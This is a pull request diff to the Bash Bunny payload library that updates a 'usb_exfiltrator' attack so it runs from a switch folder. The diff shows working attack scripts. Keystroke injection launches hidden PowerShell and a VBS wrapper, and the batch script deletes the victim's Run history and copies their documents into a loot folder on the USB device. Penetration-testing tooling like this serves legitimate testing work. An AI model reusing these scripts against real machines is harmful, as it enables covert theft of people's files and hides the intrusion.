### PR TITLE
Remove references to root directory for usb-exfiltrator payload

### DIFF
--- a/payloads/library/usb_exfiltrator/d.cmd
+++ b/payloads/library/usb_exfiltrator/d.cmd
@@ -1,4 +1,4 @@
 @echo off
 start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
-cscript %~d0\i.vbs %~d0\e.cmd
+cscript %~dp0\i.vbs %~dp0\e.cmd
 @exit

--- a/payloads/library/usb_exfiltrator/e.cmd
+++ b/payloads/library/usb_exfiltrator/e.cmd
@@ -6,7 +6,7 @@ REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
 
 REM Creates directory compromised of computer name, date and time
 REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
-set dst=%~d0\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+set dst=%~dp0\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
 mkdir %dst% >>nul
 
 if Exist %USERPROFILE%\Documents (

--- a/payloads/library/usb_exfiltrator/install.sh
+++ b/payloads/library/usb_exfiltrator/install.sh
@@ -1,8 +1,0 @@
-LED R G
-PAYLOADDIR=$(find /root/udisk/payloads/ -name d.cmd -printf '%h\n')
-cd $PAYLOADDIR
-mv d.cmd e.cmd i.vbs /root/udisk/
-sync
-LED R G B 30
-sleep 2
-exit 0

--- a/payloads/library/usb_exfiltrator/payload.txt
+++ b/payloads/library/usb_exfiltrator/payload.txt
@@ -4,16 +4,20 @@
 # Author:        Hak5Darren
 # Version:       1.0
 # Target:        Windows XP SP3+
-# Props:         Diggster
+# Props:         Diggster, IMcPwn
 # 
-# Executes d.cmd from the root of the Bash Bunny USB Disk partition,
+# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
 # which in turn executes e.cmd invisibly using i.vbs
 # which in turn copies documents to the loot folder on the Bash Bunny.
 #
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
 LED R
 ATTACKMODE HID STORAGE
 QUACK GUI r
 QUACK DELAY 100
-QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'d.cmd')"
+QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\$SWITCH_POSITION\d.cmd')"
 QUACK ENTER
 LED G

--- a/payloads/library/usb_exfiltrator/readme.md
+++ b/payloads/library/usb_exfiltrator/readme.md
@@ -1,7 +1,7 @@
 # Exfiltrator for Bash Bunnys
 
 * Author: Hak5Darren
-* Version: Version 1.0
+* Version: Version 1.1
 * Target: Windows
 
 ## Description
@@ -17,7 +17,6 @@ By default the staged payload exfiltrates PDF files. Change the xcopy commands f
 
 | LED                | Status                                       |
 | ------------------ | -------------------------------------------- |
-| Amber              | Installing e.cmd d.cmd and i.vbs to USB Disk |
 | White (blinking)   | Setup Failed. Target didn't obtain IP        |
 | Red                | Attack Setup                                 |
 | Green              | Attack Complete                              |


### PR DESCRIPTION
Information is at #5.

Don't merge until #4 or similar is accepted.